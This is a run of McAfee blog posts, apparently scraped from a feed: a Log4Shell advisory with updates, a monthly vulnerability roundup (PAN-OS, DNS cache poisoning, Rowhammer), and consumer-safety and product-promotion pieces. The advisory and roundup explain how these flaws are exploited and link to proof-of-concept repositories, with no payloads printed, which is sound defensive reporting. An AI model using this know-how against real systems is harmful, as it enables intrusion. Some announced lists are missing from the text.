On December 9th, a vulnerability (CVE-2021-44228) was released on Twitter along with a POC on Github for the Apache Log4J logging library. The bug was originally disclosed to Apache on November 24th by Chen Zhaojun of Alibaba Cloud Security Team. The impact of this vulnerability has the potential to be massive due to its effect on any product which has integrated the log4j library into its applications. This includes products from internet giants such as Apple iCloud, Steam, Samsung Cloud storage, but thousands of additional products and services will likely be vulnerable. This is just the beginning as Java is heavily used in applications spanning nearly every industry.
The vulnerability exists in the way the Java Naming and Directory Interface (JNDI) feature resolves variables. When a JNDI reference is being written to a log, JNDI will fetch all requirements to resolve the variable. To complete this process, it will download and execute any remote classes required. This applies to both server-side and client-side applications since the main requirements for the vulnerability are any attacker-controlled input field and this input being passed to the log.
To orchestrate this attack, an attacker can use several different JNDI lookups. The most popular lookup currently being seen in both PoCs and active exploitation is utilizing LDAP; however, other lookups such as RMI and DNS are also viable attack vectors. It’s worth noting that the simplistic LDAP/RMI attack vectors only work with older JDK versions. There are publications that have demonstrated methods to circumvent this limitation to achieve code execution, albeit with added complexity to the attack.
Java object deserialization vulnerabilities are not a new breed of vulnerabilities or attacks. Previous offensive research such as “marshalsec” can be applied to this vulnerability making code execution simplistic.
**Update 12/20/2021**
On December 18th, a new denial of service (DOS) vulnerability, CVE-2021-45105 was discovered affecting versions 2.0-alpha1 through 2.16.0 of Log4j. To mitigate the original Log4j vulnerability, Apache completely disabled JNDI lookups in version 2.16, however self-referential lookups remained a possibility under non-default configurations. When a nested variable is substituted by the StrSubstitutor class, it recursively calls the substitute() class. When this nested variable recursively references the variable being replaced, it leads to an infinite recursion and a DoS condition on the server. Current research shows this does not lead to code execution, like the previous vulnerabilities.
****
**Update 12/14/2021**
It has been confirmed that Log4j version 1.2 is vulnerable to similar attacks through the JMSAppender component and has been issued CVE-2021-4104. It is important to note this is not as easily exploitable as version 2.x. For exploitation to occur, JMSAppender must be enabled, and set with TopicBindingName or TopicConnectionFactoryBindingName configurations allowing JMSAppender to perform JNDI requests. This is not the default configuration.
****
**Update 12/20/2021**
Apache has released a new version of Log4j, version 2.17.0 to address the latest DOS vulnerability. Two additional classes were created that inherit from StrSubstitutor to deal with parsing strings that may contain user input. These additions do not allow recursive evaluation. Due to exploitation of this vulnerability leading to a DOS, it is considered less critical than the previously reported Log4j vulnerabilities which can lead to remote code execution. It is important to note, for exploitation to be successful there are several non-standard conditions that need to be met. As the Log4j situation is continuing to evolve, we recommend upgrading to version 2.17.0, where possible.
*****
**Update 12/14/2021**
Apache has released a new version of Log4j, version 2.16.0. This update disables JDNI by default requiring a user to explicitly turn the JNDI feature on and completely removes support for message lookups. When considering mitigations strategies for the Log4Shell vulnerabilities this should be considered the preferred method of mitigation.
****
There is a lot of information about different ways to mitigate this vulnerability. The most important and complete mitigation is to update log4j to the stable release version 2.17.0. Some sources are reporting that Java versions 6u211, 7u201, 8u191, and 11.0.1 are not vulnerable to this attack. This is not entirely the case. These versions are more resilient to the LDAP attack vector; however, they do not completely mitigate the vulnerability and are still susceptible to attack. To determine if a Java application is running a vulnerable version, a list of the impacted JAR files can be determined based on the hashes linked here.
The McAfee Enterprise ATR (Advanced Threat Research) team has been closely tracking this vulnerability since it became known. Our initial goal was to determine the ease of exploitation using the public PoC, which we have reproduced and confirmed. This was done using the public Docker container, and a client/server architecture leveraging both LDAP and RMI, along with marshalsec to exploit log4j version 2.14.1. We have posted a short video to demonstrate the reproduction for anyone who is struggling with this.
Going forward we plan to test variations of the exploit delivered using additional services such as DNS. We may update this document accordingly with results.
In the meantime, McAfee Enterprise has released a network signature KB95088 for customers leveraging NSP (Network Security Platform). The signature detects attempts to exploit CVE-2021-44228 over LDAP. This signature may be expanded to include other protocols or services, and additional signatures may be released to complement coverage.
Full coverage for this vulnerability can be tracked from our Security Bulletin here.
Resources for the issue continue to evolve and expand rapidly. A growing list of PoCs and tools can be found here:
https://github.com/tangxiaofeng7/apache-log4j-poc
https://github.com/christophetd/log4shell-vulnerable-app
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22
https://rules.emergingthreatspro.com/open/
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
https://github.com/corretto/hotpatch-for-apache-log4j2
https://github.com/nccgroup/log4j-jndi-be-gone
The post Log4Shell Vulnerability is the Coal in our Stocking for 2021 appeared first on McAfee Blog.
We all know the frustration. A new piece of tech isn’t working the way it should. Or maybe setting it up is simply turning into a royal pain. Grrr, right? Just make sure that when you go on the hunt for some help, you don’t let a tech support scam get the better of you.
Like so many scams out there, tech support scams play on people’s emotions. Specifically, the frustration you feel when things don’t work right. You want that problem fixed right now. So much so that you may not pay close enough attention to that tech support link you found in a search or came across in an ad. Tech support that looks legitimate but isn’t.
Tech support scams make good money for bad actors. In fact, the larger tech support scam operations organize and run themselves like a business, with call centers, marketing teams, finance groups, and so forth—and can rack up some serious profits to boot.
They make their money in several ways. Sometimes they’ll charge large fees to fix a non-existent problem. Other times, they’ll install information-stealing malware under the guise of software that’s supposed to correct an issue. In some cases, they’ll ask for remote access to your computer to perform a diagnosis but access your computer to steal information instead.
Fortunately, these scams are rather easy to spot. And avoid. If you know what to look for.
Let’s start with a quick overview of tech support scams. They tend to work in two primary ways.
This could be a phone call that comes from someone posing as a rep from “Microsoft” or “Apple.” The scammer on the other end of the line will tell you that there’s something wrong with your computer or device. Something urgently wrong. And then offers a bogus solution to the bogus problem, often at a high cost. Similarly, they may reach you by way of a pop-up ad. Again telling you that your computer or device is in need of urgent repair. These can find you a few different ways:
These are phony services and sites that pose as legitimate tech support but are anything but. They’ll place search ads, post other ads in social media, and so forth, ready for you to look up and get in touch with when you have a problem that you need fixed. Examples include:
While tech support scammers can and do prey on older computer users, they’re not the only ones. An apparent lack of computer savviness certainly makes older users an attractive target, yet it also seems that an apparent overconfidence in one’s savviness makes younger victims susceptible to tech support scams too. Turns out that the growing majority of victims worldwide are between 18 and 35 years old, a group that has known the internet for most, if not all, of their lives. That’s according to research from Microsoft’s Digital Crimes Unit, which found the 1 in 10 of people between the ages of 18 and 35 who encountered a tech support scam fell for it and lost money.
Whatever the age group, the U.S. Federal Trade Commission (FTC) says that the reported losses in the U.S. are into the millions, which of course does not account for the assumedly millions more that do not go reported.
Lastly, a good piece of general advice is to keep your devices and apps up to date. Regular updates often include security fixes and improvements that can help keep scammers and hackers at bay. You can set your devices and apps to download them automatically. And if you need to get an update or download it on your own, get it from the company’s official website. Stay away from third-party sites that may host malware.
This will provide protection if the scammer was able to access your account passwords in some form. While this can be a big task, it’s a vital one. A password manager that’s part of comprehensive online protection can make it much easier.
Delete files or apps that the software says is an issue. Do the same for other devices on your network too. Experienced and determined scammers can infect them as well simply by gaining access to one device on your network.
Contact your bank, credit card company, online payment platform, or wire transfer service immediately to reverse the charges. File a fraud complaint as well. The sooner you act, the better chance you have of recovering some or all your money. (Note that this is a good reason to use credit cards for online purchases, as they afford extra protection that debit cards and other payment services do not.)
In the U.S., you can contact https://www.ftc.gov/complaint, which reports the claim to thousands of law enforcement agencies. While they cannot resolve your individual issue, your report can help with broader investigations and build a case against scammers—which can make the internet safer for others. Their list of FAQs is particularly helpful too, answering important questions like “how do I get my money back?”
Here’s to holiday tech that works. And to quick fixes when things don’t go as planned. In all, if you find yourself staring down a technical issue, go straight to the source for help as we’ve outlined above. As you can see, scammers have burrowed themselves alongside otherwise legitimate ads, search results, and forums online, ready to take advantage of you when you need to get things working right.
Likewise, keep an eye and ear open for those scammers who’ll reach out to you, particularly this time of year when so many people are getting so many new devices. Realizing that legitimate tech support won’t call you out of the blue is a great place to start. In all, go with the pros you know—the ones you can reach at the companies you trust.
The post New tech for the holidays? Watch out for these tech support scams. appeared first on McAfee Blog.
Something’s not right. Maybe your phone is losing its charge way too quickly. Or one day it suddenly starts turning itself off and on again. Perhaps it’s running hot, so hot it’s hard to hold. Likewise, you might see outgoing calls that you never dialed or strange spikes in your data usage. Signs like these could mean that your smartphone’s been hacked. Learn how to protect your smartphone with McAfee Mobile Security
Several signs of a potential smartphone hack can look like a technical issue, at least on the surface. Yet the fact is that these issues may be a symptom of a deeper problem, such as malware installed on your smartphone. Malware can eat up system resources or conflict with other apps and your operating system, all of which can cause your phone to act sluggish or erratically.
Yet, in a way, that’s good news. Because malware can run inefficiently on your phone and create hiccups both large and small, it can tip you off to its presence. And with all the important information we carry in the palms of our hands nowadays, that’s good news twice over. Knowing the signs, subtle or otherwise can alert you to an otherwise largely invisible problem.
Whether hackers physically sneak it onto your phone or by tricking you into installing it via a phony app, a sketchy website, or a phishing attack, hacking software can create problems for you in a couple of ways:
Some possible signs of hacking software on your phone include:
Maybe you’ve seen some of the signs we mentioned earlier. Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? These are all signs that you could have malware running in the background, zapping your phone’s resources.
Like the performance issues above, malware or mining apps running in the background can burn extra computing power (and data). Aside from sapping performance, malware and mining apps can cause your phone to run hot or even overheat.
If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, that’s a red flag. A hacker may have hijacked your phone to send premium-rate calls or messages or to spread malware to your contacts. Similarly, if you see spikes in your data usage, that could be a sign of a hack as well.
Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.
While there are several ways a hacker can get into your phone and steal personal and critical information, here are a few tips to keep that from happening:
The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blog.
Have you noticed that when parents gather, it doesn’t take long before the topic of kids and social media comes up. That’s because concern over screen time is a big deal, especially in this post-pandemic season. Parents want to know: How much is too much screen time? When should we step in? How do we reverse poor habits, and what will the lasting digital fallout of the lockdown be?
These conversations weigh heavy on parents for a good reason. According to a report from Common Sense Media, teens spend an average of seven hours and 22 minutes on their phones a day. Tweens (ages 8 to 12) spend four hours and 44 minutes daily. This is time outside of schoolwork.
Since the pandemic, another study claims that screen time for teens doubled to 7.7 hours a day—plus 5 to 7 daily hours of online learning, according to a study published in JAMA Pediatrics. In addition, according to the Journal of Affective Disorders Reports, children overall have been spending nearly triple the recommended amount of time on their screens.
The good news is that social media also became a powerful tool for kids during the pandemic. Social channels helped kids connect with peers and combat loneliness and other mental health challenges. Still, the poor habit of device dependence may have come with those benefits.
While the debate continues over social media’s impact on kids and the research methodology continues to evolve, we can hold on to one clear truth: Any activity in excess can cause kids harm. When it comes to social media, too much screen time may contribute to sleep deprivation, a lack of healthy, and poor academics. In addition, studies show that mental health can be impacted by exposure to hate speech, sexual content, cyberbullying, and comparing oneself to others both physically and financially.
As parents, we know when our family’s wellbeing is in jeopardy. We see it even if we fail to acknowledge it right away. Our kids might become compelled to check their phones. In fact, they panic when they can’t check their likes and comments every few minutes. We notice the red eyes and moodiness at the breakfast table caused by a late-night Tic Tock marathon. We sense a surge of anxiety in our kids when technology goes from entertaining to distressing.
Thankfully, it’s never too late to help your kids better understand the impact of their actions and revise digital habits.
In the bestselling book Atomic Habits, author James Clear says, “The task of breaking a bad habit is like uprooting a powerful oak within us.” He adds, “The task of building a good habit is like cultivating a delicate flower one day at a time.” Lasting change, says clear, needs to be enjoyable, not a punishment. If the goal is shaving a few hours off your child’s screen time, consider connecting time limits to an enjoyable activity such as making a meal together or creating an art space in your home for creative projects.
The data is in: The bright screens (and blue light emitted from devices( can cause permanent sleep cycle and brain/melatonin issues, which can have a cascading effect on physical and mental health. Turning off (or limiting the use of) electronic devices at least 15-30 minutes before going to bed may help prevent any adverse effects of technology and screen use on sleep. Consider investing in filtering software that comes with the time limits the whole family can all agree on. Do your research to ensure your family’s technology functions to empower, educate, and entertain.
Consider how your child uses their time before suggesting sweeping changes to your child’s screen time. Are they vegetating, or are they consciously engaged? Are they creating and learning? Are they engaging with others or stalking accounts and slipping into “comparison despair?” Are family and school responsibilities suffering? Is there a compulsion to post or thoughtfulness? All kids are different, and all online experiences vary. Encourage your child to take time to consider how they feel and what they think while they are using their technology.
One way to negotiate screen limits is to make sure your kids understand the impact of excess media. Balance includes tapping into the benefits of social media while also taking steps to protect the body’s need for physical activity, real-life relationships, goal-setting, creative activities, mindfulness, and self-reflection.
Helping kids manage and constantly revise their social media habits is a 24/7 endeavor from the minute they wake up to the minute they fall asleep. The biggest piece of that “management” plan and is keeping frequent, open, and honest communication a critical part of designing habits that encourage a healthy relationship with both peers and technology.
The post Does Your Child Have an Unhealthy Relationship with Social Media? appeared first on McAfee Blog.
I think it’s fair to say that come to next Australia Day, there needs to be a special award category for parents of young children who survived home learning during the lockdowns. Let’s be honest – it’s been brutal! So many parents had to juggle their own full-time work, running a household, AND supervising a day’s worth of learning for often, multiple children! Research from Macquarie University showed that many parents spent up to 14 hours a week in their role as home learning managers and 9/10 parents reported the experience as, quite understandably, stressful! As a mum of older teens and young adults – who are usually self-sufficient – I’m in awe!
But the good news is – things are on the improve! Our vaccine rates are amongst the best in the world, so lockdowns have been lifted and, drum roll… kids are back at school! I’ve always been a big fan of trying to find the silver lining of any situation and I think there are many we can take away from our COVID experience, particularly when it comes to digital parenting. I know of so many parents who have completely rethought their approach to managing kids and technology since the pandemic hit because of their home learning experience.
So, in the spirit of sharing and caring, I thought I’d round up some of the best ‘aha’ moments from parents who were forced to become expert home learning managers over multiple lockdowns. And make sure you take notes because there are some great learnings that we can apply to our digital parenting journey.
If you have never been ‘all in’ with your kids’ use of technology for both learning and socializing, then you need to get over this ASAP. Technology is the lifeblood of your kids’ lives. It’s how they connect, nurture friendships, and organize their social lives. I also recommend parents try to see technology through the eyes of their kids NOT just through our more ‘mature’ lens. It’s the best way of truly understanding just what a huge role it plays in their day-to-day lives. And don’t forget that technology is almost always used to set up in-person catchups! So, please don’t demonize it, it will only push your kids away.
I totally appreciate that many parents didn’t choose to be home learning ‘managers’ however many have shared with me how they now feel far more involved in their child’s life because of the experience. Seeing first-hand how your child’s day works, overhearing their conversations with teachers and peers (courtesy of Zoom), and being blown away by your offspring’s tech skills has given many parents incredible insight into their child.
I know of parents who have noticed learning issues and friendship problems all as a result of their home learning manager role! There’s nothing like being able to nip something in the bud before it becomes a big issue! So, stay involved and you’ll reap the rewards!
Confession – I have never been one of those parents who proactively organized park visits, bushwalks, and exercise regimes for my kids. But many of the parents who managed young children through a lockdown and resorted to becoming personal trainers reported that it paid dividends. So, now lockdowns are (hopefully!) history, don’t forget about the benefits of getting your kids to move. It’s hard to be on a screen when you are walking the dog, playing a game of family cricket, or bushwalking. I know it’s time-consuming but it’s so worth it!
As of 2 years ago, the average Aussie household had 17 internet-connected devices in tow so it’s no wonder keeping abreast of all the devices in your household feels like a full-time job! But with kids continuing to use their devices for both study and socializing, it’s essential that you give each device a ‘once over’ to minimize risks and prevent issues arising down the track.
Ensuring all their software is up to date is a great place to start. Also check that the default password has been changed and that there is some top-shelf security software installed to protect the device and, most importantly, its user! And while you are there, why not also ensure that each of their online accounts has its own distinct password? If you think they could manage a password manager, then it might be time to introduce them to one? Check out McAfee’s True Key – I couldn’t manage without it!
I think you’d be hard-pressed to find many parents keen to return to home learning. In fact, I think there may even be a revolt if we had to go back! But, knowing we have picked up some ‘nuggets of gold’ along the way makes it a little feel a little better! So, please embrace technology – it’s a fantastic way of connecting with your kids. But of course, keep your family’s usage in check and minimize the risks by giving each device a once-over.
Happy Digital Parenting!
Alex
The post What We’ve Learnt From Home Learning During Lockdown appeared first on McAfee Blog.
You open up your laptop and check the daily news. You see a headline stating that one of your favorite online retailers was breached and that thousands of their customers’ passwords were exposed. Data breaches like this frequently appear in the news, but many consumers don’t realize the implications these breaches have on their personal privacy. When data breaches occur, oftentimes billions of these hacked login credentials become available on the dark web, neatly packaged for criminals to download.1
Let’s dive into the differences between the deep web and the dark web, how cybercriminals use the dark web, and what you can do to protect your data.
You’ve probably heard of the deep and dark web but may not be aware of their differences.2 First, let’s start by noting that the dark web is always part of the deep web, but the deep web is not always the dark web.
The deep web refers to the pages on the internet that are not indexed in search engines, meaning that you can’t find them by performing a simple Google search. To access these pages, you have to know the exact address to the site and access it with specific software. Most personalized and password-protected sites appear on the deep web because they contain information that is not meant to be accessed by the general public. These sites include a user’s Netflix home page, password-protected sites for banking, and the internal sites of companies, organizations, and schools. These are all examples of legitimate areas of the deep web.
On the other hand, the dark web is the disreputable extension of the deep web. Like the deep web, the dark web also houses sites that are not indexed by search engines, but it also hides a user’s identity and location. It consists mostly of illegal products or content that could be harmful to organizations or the general public. Some examples include stolen credit card numbers, fake IDs, drugs, and hacking tools. To access the dark web, a user needs to download darknet software, the most popular being Tor.
Tor, which stands for “the onion routing project,” was developed by the U.S. Navy for the government in the mid-1990s. It was open-sourced in 2004, and that’s when it went public. Today, Tor is the dark web browser that the majority of people use to surf the internet anonymously. To do this, Tor hides a user’s IP address (or the unique address that identifies an internet-connected device or network) by bouncing their search request to multiple different locations. These bounces also referred to as relays, make it much harder for people to find users on the dark web.
Because of its ability to provide anonymity, the dark web is often tied to the world of cybercrime. Scammers frequently use the dark web to find software that allows them to access other people’s computers, banking credentials, Social Insurance Numbers, and credit card information. You may be wondering how all this private information ended up on the dark web in the first place. Oftentimes when a company is breached and their customers’ data is exposed, the hackers behind the breach will upload the stolen database to the dark web. This allows other cybercriminals to purchase the stolen information and use it to target users with other scams. Say that a criminal finds a database on the dark web that contains a bunch of personal email addresses. They can purchase the database and target every email address with a phishing campaign that contains malicious links that spread malware or attempt to trick users into handing over their username and password combinations.
Incorporating cybersecurity best practices into your daily life can help protect your data from hackers looking to take advantage of the data found on the dark web. Follow these tips to bring yourself greater peace of mind:
The chances of a hacker accessing your data are higher if you use the same credentials across different accounts. That’s why it’s important to use a strong, unique password for each of your online profiles. This minimizes the potential damage that could be done if a hacker does gain access to one of your accounts. You can also use a password manager with a built-in generator to make it easier for you to access and manage passwords. Enabling multi-factor authentication will also ensure that hackers cannot access your information using only your login credentials.
If you receive an email asking you to take immediate action, stop and think. Criminals often convey urgency in their phishing scams in the hopes that an unsuspecting user will click on a malicious link or hand over their personal details without considering the legitimacy of the message. Examine suspicious emails carefully to check for telltale signs of phishing, such as poor grammar, grainy logos, or bogus links. If an email claims to be from a well-known company or brand and asks for your credentials, claims that you need to update your password, or sends you a “free offer,” go directly to the source. Contact customer service through the company’s website (not the email) and inquire about the urgent request.
Be on the lookout for breach notices from relevant companies since they are often the first to know about a data breach impacting their online customers. Create news alerts for companies that have access to your information to stay notified of the latest events.
Additionally, create notifications for your bank and other financial accounts to monitor suspicious activity, such as unauthorized transactions or a drop in credit score. You will be better prepared to mitigate any cybersecurity threats with the right security software and knowledge of the latest risks.
Use a comprehensive security solution like McAfee Total Protection, which includes dark web monitoring for up to 10 email addresses. This software actively monitors the dark web for data breaches and exposed information. Personal details include but are not limited to your date of birth, email addresses, credit card numbers, and personal identification numbers. It also provides steps for remediation after a data breach to help you regain control and the integrity of your data and privacy. With a security solution like this in place, you can continue to live your connected life confidently.
The post What is the Dark Web? Everything You Need to Know appeared first on McAfee Blog.
How do you connect online these days? I’ll give you an example from my own life: From my 15-year old son to my 80-year-old mother, not one of us leaves the house without our phone. And today, there isn’t a single thing you can’t do on your phone. It’s the minicomputer that goes where you go.
This trend in the way we connect is reflected in recent data too. In fact, we’ve found that the average consumer spends 6 hours and 55 min online per day, split between mobile (52%) and desktop (48%). Whether you’re a Boomer, Gen X, a Millennial, or Gen Z, the way you connect online is diverse and specific to you.
As for what we’re doing online? It’s just about everything. After all, we spend an average of 7 hours per day on connected devices and the pandemic has forced us to do even more online. The downside to this rapid change in the way we live is that we are opening ourselves up to more risk which leaves consumers feeling highly concerned about their ability to keep their personal info secure or private. We need new protection for this new normal.
What all these changes mean is that you’re able to have the same online experience regardless of where you are, what you’re doing, or what device you’re using. Your favorite streaming service is a great example – you can just as easily find a movie on a tablet as you can on your laptop. In fact, you can pause the movie you’re watching on that tablet and pick up where you left off on your laptop. Your experience with online security should offer the same convenience and familiarity. More importantly, online protection should give you a feeling of confidence however or wherever you choose to connect.
This means knowing your personal info is secure even when accessing an unsecured network, your browsing habits remain private, and you can take necessary actions should your information be compromised. To put it another way, YOU are what we’re focused on protecting and we do that by making sure everything you connect with is also secure.
A phone is the remote control for your life. From the palm of your hand, you’re able to shop, browse, stream, and create – everything you do online you can now do from your phone. So, it’s crucial that your phone be a major focus of our online protection. The new mobile app makes it easier to get robust protection for your identity, privacy, and phone. Let’s look at a few of the capabilities offered by the new mobile app.
Think about all the online accounts you’ve created in the past year. How many of them do you use regularly? Sometimes I think I have more food delivery apps on my phone than I do restaurants to use them on. Regardless of how often you use an account (or if you no longer use it at all!), any personal information (like emails, addresses, credit cards) added to it is available online and vulnerable to breaches. McAfee Security comes with identity protection, a feature that monitors your personal information and then notifies you when there’s a risk of your data being compromised. What this means is that if we detect that your data was stolen, you’ll be alerted an average of 10 months earlier than similar services, so you can act before your data is used illegally or shows up on the dark web.
Let’s say you’re about to use the free internet at your favorite café for a speedier connection. Time to flip on your virtual private network (VPN). Forget about digging through a sea of menus to find your VPN. The new mobile app offers a seamless VPN experience so you can keep your activity hidden on less-than-secure Wi-Fi. Or, better yet, you can set up a Secure VPN to automatically turn on for unsecured Wi-Fi networks. Whatever you choose, Secure VPN keeps your personal data and location private anywhere you go with unlimited data and bank-grade Wi-Fi encryption.
At the end of the day, phones are devices and they’re vulnerable to viruses, malware, and, increasingly, malicious apps. The new McAfee Mobile app offers an antivirus scan for Android phones and system scans to see if your passcode is strong enough and that your OS is up to date on iOS devices.
Most importantly, the app is part of McAfee’s total online protection, so the experience on your phone is the same as on your PC. It’s protection that goes where you go – at home on your PC, or on the go with your mobile.
If you’re an existing McAfee subscriber using McAfee Total Protection or McAfee LiveSafe, you can get the app right now. And, if you’ve already got the app installed, just make sure it’s up-to-date and you’ll be all set with the new look and features.
Interested in trying the app out? You can buy or get a free trial of McAfee Total Protection here and get started today.
The post Reimagining mobile security for the way we live our lives today, tomorrow, and beyond. appeared first on McAfee Blog.
You consider yourself a responsible person when it comes to taking care of your physical possessions. You’ve never left your wallet in a taxi or lost an expensive ring down the drain. You never let your smartphone out of your sight, yet one day you notice it’s acting oddly.
Did you know that your device can fall into cybercriminals’ hands without ever leaving yours? SIM swapping is a method that allows criminals to take control of your smartphone and break into your online accounts.
Don’t worry: there are a few easy steps you can take to safeguard your smartphone from prying eyes and get back to using your devices confidently.
First off, what exactly is a SIM card? SIM stands for subscriber identity module, and it is a memory chip that makes your phone truly yours. It stores your phone plan and phone number, as well as all your photos, texts, contacts, and apps. In most cases, you can pop your SIM card out of an old phone and into a new one to transfer your photos, apps, etc.
Unlike what the name suggests, SIM swapping doesn’t require a cybercriminal to get access to your physical phone and steal your SIM card. SIM swapping can happen remotely. A cybercriminal, with a few important details about your life in hand, can answer security questions correctly, impersonate you, and convince your mobile carrier to reassign your phone number to a new SIM card. At that point, the criminal can get access to your phone’s data and start changing your account passwords to lock you out of your online banking profile, email, and more.
SIM swapping was especially relevant right after the T-Mobile data breach.1 Cybercriminals stole millions of phone numbers and the users’ associated personal details. Criminals could later use these details to SIM swap, allowing them to receive users’ text or email two-factor authentication codes and gain access to their personal accounts.
The most glaring sign that your phone number was reassigned to a new SIM card is that your current phone no longer connects to the cell network. That means you won’t be able to make calls, send texts, or surf the internet when you’re not connected to Wi-Fi. Since most people use their smartphones every day, you’ll likely find out quickly that your phone isn’t functioning as it should.
Additionally, when a SIM card is no longer active, the carrier will often send a notification text. If you receive one of these texts but didn’t deactivate your SIM card, use someone else’s phone or landline to contact your wireless provider.
Check out these tips to keep your device and personal information safe from SIM swapping.
With just a few simple steps, you can feel better about the security of your smartphone, cellphone number, and online accounts. If you’d like extra peace of mind, consider signing up for an identity theft protection service like McAfee Identity Protection Service. McAfee, on average, detects suspicious activity ten months earlier than similar monitoring services. Time is of the essence in cases of SIM swapping and other identity theft schemes. An identity protection partner can restore your confidence in your online activities.
1“T-Mobile data breach and SIM-swap scam: How to protect your identity”
The post What Is SIM Swapping? 3 Ways to Protect Your Smartphone appeared first on McAfee Blog.
CVE-2021-20322: Of all the words of mice and men, the saddest are, “it was DNS again.”
For all our newcomers, welcome to the Advanced Threat Research team’s monthly bug report – a digest of all the latest and greatest vulnerabilities from the last 30-ish days based on merits just a tad more nuanced than sorting NVD by “CVSS > 9.0.” Instead, we focus on qualitative and experience-based analysis, relying on over 100 years of combined industry experience within our team.
To those who are returning after having read last month’s issue, I would like to congratulate you for being a Bug Report fan before it was cool – which it now most assuredly is, thanks in no small part to a litany of fascinating vulnerabilities. We encourage our veterans to stick around as long as possible, so that a year from now you can complain about how we’re washed up and how much better our early editions were.
Palo Alto Networks (PAN) firewalls that use its GlobalProtect Portal VPN running PAN-OS versions older than 8.1.17 are vulnerable to a cutting-edge, state-of-the-art style of vulnerability known as a “stack-based buffer overflow.” Although the vulnerable code is normally not reachable, when combined with an HTTP smuggling vulnerability, CVE-2021-3064 can be used to gain remote code execution, a remote shell, and even access to sensitive configuration data according to Randori Attack Team researchers. Randori discovered the vulnerability over a year ago but chose not to disclose it to PAN until September of this year, using it as part of its “continuous and automated red team platform” during the interim – I suppose we should be thankful that PAN has claimed in its security advisory that no evidence of exploitation of this vuln has been discovered, despite its age.
Absence of “in-the-wild” exploitation aside, we should also be grateful that the number of people who should care is rapidly dwindling (an ever-present theme of 2021). Randori initially reported over 70,000 internet-accessible PAN firewalls running vulnerable versions of PAN-OS according to Shodan, which it later amended to 10,000. As of this writing, that number has fallen to around 7,000. Even so, 7,000 vulnerable firewalls mean an even larger number of vulnerable clients at risk of an over-the-internet attack vector requiring zero authentication. Those connecting to PAN firewalls running on VMs have even greater cause for concern as these lack ASLR, a factoid I have chosen to add to my ever-growing “why is that a thing” list, right next to the Ghostbusters remake.
We suggest an experiment: open the Shodan search linked above and note the total number of devices running a vulnerable version of PAN-OS. Next, call up whoever manages your firewall and demand they power it down immediately – use threats if you must. Check the Shodan scan again: has the number gone down? If so, it’s probably time to update. If you’re an Arch user and the prospect of updating terrifies you, Palo Alto has also indicated that its signatures for Unique Threat IDs 91820 and 91855 should block exploitation of CVE-2021-3064.
Be sure to stay up to date on the latest CVEs – our security bulletins are a great resource for finding product information for all kinds of critical vulnerabilities.
Researchers at the University of California, Riverside have discovered a flaw in the way the Linux kernel handles “ICMP fragment needed” and “ICMP redirect” errors, allowing an attacker to quickly learn the randomized port number assigned to a UDP socket. What this description fails to convey is the big picture impact of this vulnerability, which is its use as a side-channel for the now-prehistoric DNS cache poisoning attack, in which an off-path malicious actor ‘poisons’ a DNS resolver’s cache with a false record, mapping a known domain (google.com) to an IP address of their choosing (98.136.144.138). Truly nefarious.
To be frank, just about everyone should be at least raising an eyebrow at this one. Although the researchers have indicated in their whitepaper that this particular side-channel only affects about 13.85% of open resolvers on the internet, it’s important to note that various security services rely on proof of domain ownership, including even the issuing of certificates, making the impact tremendous. Users of popular DNS service Quad9 have particular cause for concern, as the paper claims it falls under the vulnerable 13.85%. Linux users should also be concerned, and not just because their drivers refuse to work – DNS software such as BIND, Unbound, and dnsmasq running on their platform of choice are also vulnerable.
This is where things get tricky. DNS extensions that were standardized over two decades ago, such as DNSSEC and DNS cookies, should successfully mitigate this and all other DNS cache poisoning attack side channels. The unfortunate reality is that these features see very limited adoption due to backwards-compatibility concerns. While we wait for these dinosaurs holding back progress to die out, the authors of the aforementioned whitepaper have suggested some alternative mitigations, including enabling the IP_PMTUDISC_OMIT socket option, introducing additional randomization to the structure of the DNS exception cache, and configuring DNS servers with a singular default gateway to outright reject ICMP redirects. Further details can be found in section 8.4 of their paper.
Unfortunately, not every vulnerability can be adequately addressed by network security products, and this vulnerability happens to be one of those cases. Your best bet is to follow the mitigations mentioned above and keep your servers up to date.
Blacksmith, a name referring to both the vulnerability and the fuzzer created to exercise it, is a new implementation of the Rowhammer DRAM hardware vulnerability from 2014. The crux of Rowhammer is the use of high frequency read operations to induce bit flips in neighboring regions of physical memory, which can lead to the crossing of any security barrier if the attacker can massage memory so that critical data is stored in a vulnerable physical page. Modern DRAM hardware uses a technology called Target Row Refresh (TRR) to prematurely refresh regions of physical memory targeted by common Rowhammer attacks. Researchers at ETH Zurich and their associates discovered that TRR exploits the uniform nature of memory accesses used by existing Rowhammer attacks to “catch” them, and so devised a Rowhammer attack that used non-uniform accesses, arriving at CVE-2021-42114, which bypasses TRR and all other modern Rowhammer mitigations.
Everyone. Just about every common electronic device you can think of uses DRAM and of the DIMMs (RAM sticks) tested, the researchers did not find a single one that was completely safe. It might be easy to presume that hardware vulnerabilities such as this are academically fascinating but have little real-world impact, but research published since 2014 has shown Rowhammer attacks successfully escape JavaScript containers in the browser, cross VM boundaries in the cloud, and even achieve RCE across networks with high enough throughput. Perhaps the greatest tragedy of Blacksmith is that it arrived a month too late – it would have fit in perfectly with Halloween monsters like Freddy Krueger or Jason Voorhees who also see new iterations every few years and refuse to stay dead.
Hide your PC, hide your tablet, and hide your phone, ‘cause they’re hammerin’ everybody out there. Beyond that, there’s not much to be done besides wait for JEDEC to develop a fix and for DRAM manufacturers to begin supplying hardware with the new standard.
We at McAfee Enterprise are doing everything in our power to address this critical vulnerability. In other words, we’ll be waiting for that JEDEC fix right along with you.
The post The Bug Report – November Edition appeared first on McAfee Blog.
Relying on the kindness of strangers is not an ideal strategy for CISOs and CIOs. And yet that is the precise position where most find themselves today while trying to battle cybersecurity issues across their supply chain. While these supply chains have plenty of their own challenges, such as global disruptions of distribution, our recent research shows that it’s the cybersecurity problems that will long survive for the long term.
